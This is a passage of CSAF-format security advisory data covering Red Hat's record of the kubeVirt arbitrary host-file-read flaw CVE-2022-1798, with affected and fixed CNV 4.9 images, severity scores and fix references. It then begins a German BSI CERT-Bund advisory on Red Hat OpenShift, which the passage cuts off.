"8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64" }, "product_reference": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64" }, "product_reference": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64" }, "product_reference": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64" }, "product_reference": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64" }, "product_reference": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64" }, "product_reference": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64" }, "product_reference": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64" }, "product_reference": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64" }, "product_reference": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64" }, "product_reference": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64" }, "product_reference": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64" }, "product_reference": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", "relates_to_product_reference": "8Base-CNV-4.9" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "Oliver Brooks and James Klopchic" ], "organization": "NCC Group" } ], "cve": "CVE-2022-1798", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2022-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2117872" } ], "notes": [ { "category": "description", "text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", "title": "Vulnerability description" }, { "category": "summary", "text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64" ], "known_not_affected": [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1798" }, { "category": "external", "summary": "RHBZ#2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1798" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798" }, { "category": "external", "summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" } ], "release_date": "2022-08-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-22T08:16:30+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6681" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs" } ] }
wid-sec-w-2022-1312
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um Informationen offenzulegen und Sicherheitsma\u00dfnahmen zu umgehen.", "title": "Angriff" }, { "category": "general", "text": "- UNIX\n- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2022-1312 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2022-1312.json" }, { "category": "self", "summary": "WID-SEC-2022-1312 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-1312" }, { "category": "external", "summary": "RHSA-2022:6351 - Security Advisory vom 2022-09-06", "url": "https://access.redhat.com/errata/RHSA-2022:6351" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2022:3333-1 vom 2022-09-22", "url": "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012328.html" }, { "category": "external", "summary": "Red Hat Security Advisory RHSA-2022:6681 vom 2022-09-22", "url": "https://access.redhat.com/errata/RHSA-2022:6681" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2022:3335-1 vom 2022-09-22", "url": "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012327.html" }, { "category": "external", "summary": "SUSE Security Update SUSE-SU-2022:3334-1 vom 2022-09-22", "url": "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012329.html" }, { "category": "external", "summary": "Red Hat Security Advisory 